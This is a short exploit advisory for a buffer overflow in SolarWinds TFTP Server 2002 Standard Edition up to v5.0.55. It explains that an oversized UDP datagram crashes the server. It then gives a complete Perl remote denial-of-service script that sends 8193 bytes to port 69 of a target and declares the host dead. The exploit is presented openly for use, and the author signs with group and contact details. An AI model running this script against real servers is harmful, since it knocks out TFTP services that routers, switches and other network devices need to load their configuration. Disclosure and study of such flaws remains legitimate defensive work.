############################################# #Product: TFTP Server 2002 Standard Edition # #Authors: SolarWinds [www.SolarWinds.net] # #Vulnerable versions: v.5.0.55 and bellow # #Vulnerability: buffer overflow # #Bug&exploit by D4rkGr3y [www.dhgroup.org] # ############################################# #Overview#--------------------------------------------------------------# >From TFTP Server help: "Many network devices require a TFTP Server to load their initial operating system or configuration. Many routers, switches, hubs, X-terminals, printers, terminal servers, etc need a TFTP server in order to load their initial configuration". #Description#------------------------------------------------------------# First, TFTP - Trivial File Transfer Protocol. This is not FTP! TFTP and FTP are different protocols - it's very important! TFTP uses UDP protocol for it's work and it doesn't support some FTP's stuff. Directory travel for example. U can use TFTP for file transfer only. Read RFC 1350 for more details. #Bug#--------------------------------------------------------------------# It's possible to crash TFTP server using UDP datagram with a large size (8193b and above). Vulnerable application on remote host will be closed with error message: Run-time error '10040': The datagram is too large to fit into the buffer and is truncated. #Exploit#----------------------------------------------------------------# #!/usr/bin/perl #TFTP Server remote DoS exploit by D4rkGr3y use IO::Socket; $host = "vulnerable_host"; $port = "69"; $data = "q"; $num = "8193"; $buf .= $data x $num; $socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: $@\n"; $ipaddr = inet_aton($host); $portaddr = sockaddr_in($port, $ipaddr); send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n"; print "Now, '$host' must be dead :)\n"; #EOF Best regards www.dhgroup.org D4rkGr3y icq 540981
